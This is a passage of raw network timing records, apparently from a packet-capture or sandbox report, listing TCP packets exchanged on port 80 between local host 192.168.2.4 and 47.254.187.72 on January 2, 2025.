                                                                            Jan 2, 2025 20:34:56.527138948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527146101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527156115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527167082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527169943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527175903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527187109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527196884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527204037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527204990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527215958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527228117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527235031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527235985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527244091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527246952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527256966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527266979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527267933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527276993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527285099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527304888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527323961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527328968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527333975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527343988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527347088 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527354956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527365923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527373075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527375937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527384996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527395964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527400970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527405024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527406931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527416945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527417898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527426958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527436972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527446985 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527447939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527457952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527468920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527476072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527478933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527488947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527491093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527498007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527508020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527513027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527524948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527534008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527534962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527543068 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527573109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.631395102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.631412983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.631423950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.631434917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.631443024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.631454945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.631490946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.633044004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.633053064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.633068085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.633090973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.633105040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.633116007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.633126974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.633152008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.636476994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.636539936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.636562109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.636574030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.636590958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.636609077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.636624098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.638107061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.638125896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.638134956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.638170958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.638173103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.638181925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.638190031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.638214111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.638247967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.639904976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.639915943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.639926910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.639936924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.639950037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.639961958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.639992952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.643240929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.643250942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.643260002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.643270969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.643279076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.643291950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.643322945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.645062923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.645075083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.645087004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.645097017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.645100117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.645132065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.645170927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.648503065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.648523092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.648534060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.648544073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.648557901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.648587942 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.650275946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.650288105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.650299072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.650310040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.650333881 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.650373936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.651849985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.651861906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.651873112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.651882887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.651887894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.651918888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.655236006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.655246019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.655273914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.655278921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.655292988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.655303001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.655318022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.655338049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.655373096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.656955004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.656974077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.656991005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.657001019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.657001972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.657031059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.657058001 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.660579920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.660598040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.660629988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.660650015 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.660727978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.660762072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.660770893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.660794973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.660810947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.662190914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.662203074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.662214994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.662225962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.662251949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.662271023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.663727045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.663737059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.663753033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.663764954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.663773060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.663783073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.663824081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.667318106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.667340994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.667351007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.667356968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.667363882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.667388916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.667399883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.668875933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.668924093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.668932915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.668943882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.668945074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.668953896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.668993950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.672275066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.672305107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.672314882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.672326088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.672333956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.672348976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.672363997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.673901081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.673911095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.673922062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.673953056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.673985958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.677400112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.677417040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.677428961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.677438974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.677452087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.677462101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.677495956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.679119110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.679131985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.679141998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.679176092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.679188967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.680747032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.680763006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.680775881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.680784941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.680795908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.680798054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.680805922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.680826902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.680856943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.684250116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.684295893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.684334993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.684345007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.684355974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.684365988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.684376955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.684416056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.685980082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.685991049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.686007023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.686017036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.686028004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.686028004 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.686064005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.689423084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.689476967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.689486027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.689496040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.689507008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.689507008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.689543962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.691284895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.691297054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.691307068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.691323042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.691330910 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.691365004 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.692748070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.692789078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.692797899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.692807913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.692819118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.692826033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.692852974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.692883015 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.696278095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.696289062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.696300030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.696310043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.696329117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.696346045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.697809935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.697866917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.697889090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.697899103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.697907925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.697917938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.697928905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.697947025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.697978973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.701368093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.701379061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.701395988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.701407909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.701416016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.701422930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.701452017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.702975988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.702986956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.702997923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.703018904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.703039885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.704765081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.704782963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.704793930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.704803944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.704819918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.704824924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.704850912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.704870939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.718163967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.718174934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.718190908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.718199968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.718205929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.718210936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.718216896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.718215942 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.718255997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.719827890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.719871998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.719881058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.719892025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.719902039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.719914913 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.719926119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.719940901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.719935894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.719953060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.719963074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.719974995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.719995022 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.724966049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.724980116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.724997044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.725007057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.725008011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.725018024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.725033045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.725049019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.725055933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.725060940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.725070953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.725089073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.725109100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.730102062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.730119944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.730129957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.730139971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.730150938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.730159998 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.730160952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.730170965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.730200052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.730226994 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.735330105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.735342026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.735358953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.735368967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.735374928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.735379934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.735390902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.735404968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.735423088 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.738712072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.738723040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.738734007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.738743067 CET804973047.254.187.72192.168.2.4
